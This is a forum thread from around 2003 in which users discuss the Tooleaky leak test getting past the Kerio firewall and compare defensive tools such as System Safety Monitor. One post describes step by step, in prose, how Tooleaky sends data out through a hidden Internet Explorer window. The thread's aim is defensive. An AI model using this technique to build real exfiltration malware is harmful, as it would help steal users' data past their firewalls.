I tried Tooleaky and it ran right through Kerio and said My firewall (kerio) is useless. If this is the case how do I fix it?

-{ Quote: " quoting: notageek link=board=23;threadid=8372;start=0#54294 date=1049923977]I tried Tooleaky and it ran right through Kerio and said My firewall (kerio) is useless. If this is the case how do I fix it?" }-

The current release version of Kerio (v2.14) does not handle this type of program hijacking or .dll injection.

One related post I found from the Kerio forum at DSLR:
http://www.dslreports.com/forum/remark,2823724~root=kerio~mode=flat

The v3.0x betas introduced measures to deal with this kind of potential vulnerability, but development stopped. Kerio is currently working on a new v3.5 which may be out shortly for beta testing. I would suspect it will also have measures to deal with this sort of thing.

For those not familiar with tooleaky:
http://tooleaky.zensoft.com/

Regards,

CrazyM

-{ Quote: " quoting: notageek link=board=23;threadid=8372;start=0#54294 date=1049923977]
I tried Tooleaky and it ran right through Kerio and said My firewall (kerio) is useless. If this is the case how do I fix it?
" }-

Hello,

You might run System Safety Monitor in conjunction with your FW and pass all
leaktests with flying colours.

Rgds,

The beauty of "tooleaky" was not in its coding, but in the idea itself and its simplicity! If you look at the source code, there's really nothing to it, and yet, it can get by an awful lot of software firewalls. Or at least it could, until they started adding a lot of additional complex features to prevent this type of "exploit". Obviously, they never updated the old version of Kerio against this exploit, but most software firewalls have already or are addressing this and other exploit methods in their newer versions.

The tooleaky concept depends entirely upon a piece of malware (tooleaky.exe in this case) being able to run a program that has been granted access out to the Internet through the firewall without the user knowing.

You can defeat this type of exploit by not allowing any programs access out through the firewall without the user having to specifically allow them each time a new instance starts up. Well, that setup would defeat the simple tooleaky design, but, not the next thing someone thought up...

Next they started having the malware program itself try to kill the software firewalls, or in some cases, have it "press" the confirmation buttons on the firewall alert pop-ups itself. And so went the attack mechanisms, and now the software firewall companies have to have protections from being killed from within the computer in them, protections against programs being able to click their buttons, and so on.

There is of course one simple protection to all these types of exploits. They all require the user to download and execute a program. Safe computing habits make a formidable initial line of defense.

After that, having the latest version of your software firewall, with all these special extra protections is what's needed, along side a safe configuration, of course.

-{ Quote: " quoting: JacK link=board=23;threadid=8372;start=0#54300 date=1049928497]You might run System Safety Monitor in conjunction with your FW and pass all leaktests with flying colours." }-

Yes, tools like SSM and Tiny Trojan Trap are the best defenses against these various exploits because they monitor and control the behavior of programs, and how they interact with the OS and each other.

Many software firewall vendors are simply trying to build ever higher walls and other layers of defense around themselves. But, I think with every defense they add, the other side will just find a way to circumvent that. It'll go back and forth forever. :-\

For anyone interested, here is what "tooleaky" itself does:
-{ Quote: "1. tooleaky checks for the exact location of your PC's Internet Explorer executable by reading this registry key:

HKLM\Software\Classes\Applications\iexplore.exe\shell\open\command

If you have IE installed, this will tell tooleaky exactly where the program is so that it can build a command string to execute it. Note that real malware could look for andf run any program, not just IE.

2. It builds a command string to run IE, targeting a specific URL (a webpage at GRC), and to that it adds some simulated "secret data" from your system. (Actually, it's just a hard coded string: "PersonalInfoGoesHere" - nothing real, but it could have been personal data it read off your hard drive.)

3. tooleaky now calls a Windows function to execute the IE command it has built in a hidden window.

Windows allows for hidden windows to execute - i.e. ones that show nothing on the taskbar. In this Window, Internet Explorer runs with the purposes of browsing that specific GRC page...

4. It then simply waits for the hidden window to open and to contact the webpage. (tooleaky "loops" here in the code, scanning constantly for the IE window.)

5. If it doesn't find the window in 30 seconds, you pass the tooleaky test and it tells you so. If it finds that window, you fail the test and it tells you your system in not secure.

6. It closes the hidden IE window it made above, and the program exits." }-

That's all there is to it. It's a very simple attack considering how complex it is for the software firewall applications to defend against it.

I swictched to Kerio from Sygate cuz you're able to make a loopback rule. I didn't want progams piggybacking on Proxo. But now I see Kerio can't block this type of stuff. I wonder is McAfee firewall 4.0 will block piggybacks and tooleaky. :) Bloat up my computer to be safe. LOL ;) I tried SSM and it gave me an error message. It don't work well with XP. I also tried LookNStop and it said something about a drive not installed. I don't know what that means but you know. Maybe I'll go back to Sygate and pray nothing piggybacks proxo will I'm online until they come up with a fix for it. :) Tanks guys for the help.

-{ Quote: " quoting: notageek link=board=23;threadid=8372;start=0#54306 date=1049932559]
--cut--
I tried SSM and it gave me an error message. It don't work well with XP.
--cut--" }-

Hello,

SSM is at its best with WinXP ;)

Don't hesitate to contact Max (bugsbunnyATe-mail.ru) if you encountered any problem.

Rgds,

I'll try it again. It could of been a bad install or a bad download. Thanks Jack.

-{ Quote: " quoting: notageek link=board=23;threadid=8372;start=0#54294 date=1049923977]
I tried Tooleaky and it ran right through Kerio and said My firewall (kerio) is useless. If this is the case how do I fix it?
" }-

hi notageek - I use Kerio 2.13 and Proxo, and have always beaten tooleaky, leaktest and firehole, even when I used IE...

Do you mean that you do not get an alert that Leaktest wants access out, or that it gets out 'secretly'?

I have three simple rules that stop them all. I allow Opera/ Phoenix access to Proxo thru localhost:8080; I disallow any other apps any access to Proxo at all; and I allow Proxo full access out to any remote address;

When I run Leaktest or Firehole, Opera opens up and connects to my homepage, then I get an alert that 'Firewall Leak Test Utlity wants to connect to GRC' and I deny it....thats it...

Now, if you want it to be denyed, without any alert at all. then as I understand it you need the 'application blah blah filtering' that is supposed to be coming in the newer versions...

Now I may be wrong, I'm a novice and no one ever believes that I have always foiled leaktest, tooleaky and firehole, but its always worked for me. I think Tooleaky is hard wired to use IE, as it nevers even opens a connection on my machine, as far as I know...haha...

Good luck

dmc

Tooleaky sneaks out without me knowing it. Kerio has a slight learning curve. Maybe the new Kerio (whenever it comes out) might be a little better. But right now I'me waiting for the new Sygate or Outpost. I'm going to jump on the first one that comes out.

For those of you using SSM - Does it automatically work on all user profiles in WinXP Pro? Or does it have to be configured to do so?

I don't want to install it and then have the other users playing with it while I'm trying to learn what to do with it. Thanks. Pete

I haven't used it on XP, but it has a user mode, and can be password protected.
Its a small free program, so I think there is minimal risk in installing it and checking it out.
FWIW Pete, SSM is a must have in my security line up. If I had to choose between SSM and an AT, I would take SSM.
The best thing about it is that there are several exploits, aka leak tests, that have not even been discovered or publicized yet, and while firewall vendors will have to react to block them, SSM is already able to.

What the defference between SSM and Abtrusion Protector? Does it use less resource than Abtrusion Protection?

-{ Quote: " quoting: spy1 link=board=23;threadid=8372;start=0#54467 date=1050069970]
For those of you using SSM - Does it automatically work on all user profiles in WinXP Pro? Or does it have to be configured to do so?

I don't want to install it and then have the other users playing with it while I'm trying to learn what to do with it. Thanks. Pete
" }-
SSM protects all users but only the user that logs on at bootup will get the prompts for new applications. so another user that tries to install a new application will have no idea why they cant because the prompt will be on the original users screen.

Thank you, root and SC. I'm liking the sound of it more and more. Pete

-{ Quote: " quoting: notageek link=board=23;threadid=8372;start=0#54478 date=1050078441]
What the defference between SSM and Abtrusion Protector? Does it use less resource than Abtrusion Protection?
" }-
Hello,

SSM uses about 6 Mo Ram on my system WinXP PRo, I don't remember how much for AP.

SSM is compatible with non NT OS AP is not.

The biggest issue with AP is that you must be ABSOLUTELY sure you OS is clean : when installing, it scans all exe and dll and everything is considered as trusted by default, as well an installed walware.

Rgds,

Thanks Jack.